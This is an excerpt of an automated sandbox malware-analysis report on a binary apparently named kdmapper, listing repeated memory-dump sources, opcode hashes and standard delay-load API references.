                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3081899298-0
                                                                                                                                                                                                      • Opcode ID: 8ec2233ba4b51a7e6cf228d7bbeef7a90daa8f4bb1511338c272f5fc2f5fa9c6
                                                                                                                                                                                                      • Instruction ID: f25c6024631eb204eeb3ed87b52b447b8c5458dff9168981247b8d8f4dc0359e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec2233ba4b51a7e6cf228d7bbeef7a90daa8f4bb1511338c272f5fc2f5fa9c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC00234404249D68E219A24D84909A7722AB537A77B89694D4798E4A1C326CD9FEB12
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 67527cfb7deb8e77009274fc53eb167bb088c613b474247ff7e9e79f2a19bc5a
                                                                                                                                                                                                      • Instruction ID: b4cd3665be87d8a1880f20824e80437fee19f4f5333f088fbd52bc79f4660030
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67527cfb7deb8e77009274fc53eb167bb088c613b474247ff7e9e79f2a19bc5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18B012DE358100BC310831491D12C37014CC1C2B10330C63EFC11D0484DB50AD202C71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 416fd4a53674d0d301cc102b3c3e3a8ec51d372c6bd19ca2a42000ed3dc80f5b
                                                                                                                                                                                                      • Instruction ID: 2f17b29598c3a91f1b071be06be10ae15d424c7344a3ece4a0d2a8a1e5ce294e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 416fd4a53674d0d301cc102b3c3e3a8ec51d372c6bd19ca2a42000ed3dc80f5b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65B012DA358000AC314872091D02C37018CC1C2B10331C23EFC15C11C4DB50AD241E71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 3cf6176e46c5af81ebbc80d3c32ce15cf490a04847558576aa6da6efd92eb78c
                                                                                                                                                                                                      • Instruction ID: dd3109d3bc593cbb33216722a966f063b3a3baad6f6f1f79bf09aeda7a836a13
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf6176e46c5af81ebbc80d3c32ce15cf490a04847558576aa6da6efd92eb78c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81B012DE35C100AC3148714D1D02C37018CC1C1B10330823EF815C1084DB606D202E71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 05ee5d70c5eb9da49693c153b8738bf29e05647d93b99dee797c7292ac130137
                                                                                                                                                                                                      • Instruction ID: 664487f9f9cc4cef250582dd1f56c04bbd033f8112e6e26c58dac8974ee17bca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05ee5d70c5eb9da49693c153b8738bf29e05647d93b99dee797c7292ac130137
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85B012EA358000BC314871091D02C37018CC5C2F10330C23EFC15C1084DB50AE201D71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 7facce2d423498d1ac470fa07b5be98facb92ff6d400bb212f248974702b6efe
                                                                                                                                                                                                      • Instruction ID: fb3654495d902f565c3109d0ac951fe1785d50eee2efa70172db6dd9f96808b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7facce2d423498d1ac470fa07b5be98facb92ff6d400bb212f248974702b6efe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07B012DA358140BC318872091D02C37018CC1C1B10331C33EF815C11C4DB507D641D71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3
                                                                                                                                                                                                        • Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
                                                                                                                                                                                                        • Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                                                                      • Opcode ID: 510bba7c31f4b5d50a2df96a107e7ad5506b264870d754a5a07e8af06f6fd3e9
                                                                                                                                                                                                      • Instruction ID: 9bdcd6d53adaf7b28ffb9431251959c306471a7ee5e32e9ff35aef772800093e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510bba7c31f4b5d50a2df96a107e7ad5506b264870d754a5a07e8af06f6fd3e9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9A011EA2A8002BC300832022C02C3B028CC0C2B203308A2EF802C0088AAA028202CB0